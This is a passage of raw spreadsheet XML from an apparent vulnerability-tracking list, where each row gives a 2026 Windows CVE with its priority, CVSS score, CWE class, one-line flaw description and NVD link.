      <c r="F2200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2200" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2200" s="5" t="inlineStr"/>
      <c r="I2200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2200" s="5" t="inlineStr"/>
      <c r="K2200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2200" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="C2201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2201" s="5" t="inlineStr"/>
      <c r="F2201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2201" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2201" s="5" t="inlineStr"/>
      <c r="I2201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2201" s="5" t="inlineStr"/>
      <c r="K2201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="C2202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2202" s="5" t="inlineStr"/>
      <c r="F2202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2202" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2202" s="5" t="inlineStr"/>
      <c r="I2202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2202" s="5" t="inlineStr"/>
      <c r="K2202" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2202" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69731</t>
        </is>
      </c>
      <c r="C2203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2203" s="5" t="inlineStr"/>
      <c r="F2203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2203" s="5" t="inlineStr"/>
      <c r="H2203" s="5" t="inlineStr"/>
      <c r="I2203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2203" s="5" t="inlineStr"/>
      <c r="K2203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t>
        </is>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="C2204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2204" s="5" t="inlineStr"/>
      <c r="F2204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2204" s="5" t="inlineStr"/>
      <c r="I2204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2204" s="5" t="inlineStr"/>
      <c r="K2204" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2204" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="C2205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2205" s="5" t="inlineStr"/>
      <c r="F2205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2205" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2205" s="5" t="inlineStr"/>
      <c r="I2205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2205" s="5" t="inlineStr"/>
      <c r="K2205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="C2206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2206" s="5" t="inlineStr"/>
      <c r="F2206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2206" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2206" s="5" t="inlineStr"/>
      <c r="I2206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2206" s="5" t="inlineStr"/>
      <c r="K2206" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2206" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="C2207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2207" s="5" t="inlineStr"/>
      <c r="F2207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2207" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2207" s="5" t="inlineStr"/>
      <c r="I2207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2207" s="5" t="inlineStr"/>
      <c r="K2207" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2207" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="C2208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2208" s="5" t="inlineStr"/>
      <c r="F2208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2208" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2208" s="5" t="inlineStr"/>
      <c r="I2208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2208" s="5" t="inlineStr"/>
      <c r="K2208" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2208" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="C2209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2209" s="5" t="inlineStr"/>
      <c r="F2209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2209" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2209" s="5" t="inlineStr"/>
      <c r="I2209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2209" s="5" t="inlineStr"/>
      <c r="K2209" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2209" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="C2210" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2210" s="5" t="inlineStr"/>
      <c r="F2210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2210" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2210" s="5" t="inlineStr"/>
      <c r="I2210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2210" s="5" t="inlineStr"/>
      <c r="K2210" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2210" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="C2211" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2211" s="5" t="inlineStr"/>
      <c r="F2211" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2211" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2211" s="5" t="inlineStr"/>
      <c r="I2211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2211" s="5" t="inlineStr"/>
      <c r="K2211" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L2211" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="C2212" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2212" s="5" t="inlineStr"/>
      <c r="F2212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2212" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2212" s="5" t="inlineStr"/>
      <c r="I2212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2212" s="5" t="inlineStr"/>
      <c r="K2212" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L2212" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="C2213" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2213" s="5" t="inlineStr"/>
      <c r="F2213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2213" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2213" s="5" t="inlineStr"/>
      <c r="I2213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2213" s="5" t="inlineStr"/>
      <c r="K2213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="2214">
      <c r="A2214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="C2214" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2214" s="5" t="inlineStr"/>
      <c r="F2214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2214" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2214" s="5" t="inlineStr"/>
      <c r="I2214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2214" s="5" t="inlineStr"/>
      <c r="K2214" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2214" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="C2215" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2215" s="5" t="inlineStr"/>
      <c r="F2215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2215" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2215" s="5" t="inlineStr"/>
      <c r="I2215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2215" s="5" t="inlineStr"/>
      <c r="K2215" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2215" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="C2216" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2216" s="5" t="inlineStr"/>
      <c r="F2216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2216" s="5" t="inlineStr"/>
      <c r="H2216" s="5" t="inlineStr"/>
      <c r="I2216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2216" s="5" t="inlineStr"/>
      <c r="K2216" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2216" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="C2217" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2217" s="5" t="inlineStr"/>
      <c r="F2217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2217" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2217" s="5" t="inlineStr"/>
      <c r="I2217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2217" s="5" t="inlineStr"/>
      <c r="K2217" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="L2217" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="C2218" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2218" s="5" t="inlineStr"/>
      <c r="F2218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2218" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2218" s="5" t="inlineStr"/>
      <c r="I2218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2218" s="5" t="inlineStr"/>
      <c r="K2218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="C2219" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2219" s="5" t="inlineStr"/>
      <c r="F2219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2219" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2219" s="5" t="inlineStr"/>
      <c r="I2219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2219" s="5" t="inlineStr"/>
      <c r="K2219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2219" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="C2220" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2220" s="5" t="inlineStr"/>
      <c r="F2220" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2220" s="5" t="inlineStr"/>
      <c r="H2220" s="5" t="inlineStr"/>
      <c r="I2220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2220" s="5" t="inlineStr"/>
      <c r="K2220" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2220" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="C2221" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2221" s="5" t="inlineStr"/>
      <c r="F2221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2221" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2221" s="5" t="inlineStr"/>
      <c r="I2221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2221" s="5" t="inlineStr"/>
      <c r="K2221" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2221" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="C2222" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2222" s="5" t="inlineStr"/>
      <c r="F2222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2222" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2222" s="5" t="inlineStr"/>
      <c r="I2222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2222" s="5" t="inlineStr"/>
      <c r="K2222" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2222" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="C2223" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2223" s="5" t="inlineStr"/>
      <c r="F2223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2223" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2223" s="5" t="inlineStr"/>
      <c r="I2223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2223" s="5" t="inlineStr"/>
      <c r="K2223" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2223" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70574</t>
        </is>
      </c>
      <c r="C2224" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2224" s="5" t="inlineStr"/>
      <c r="F2224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2224" s="5" t="inlineStr"/>
      <c r="H2224" s="5" t="inlineStr"/>
      <c r="I2224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2224" s="5" t="inlineStr"/>
      <c r="K2224" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2224" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
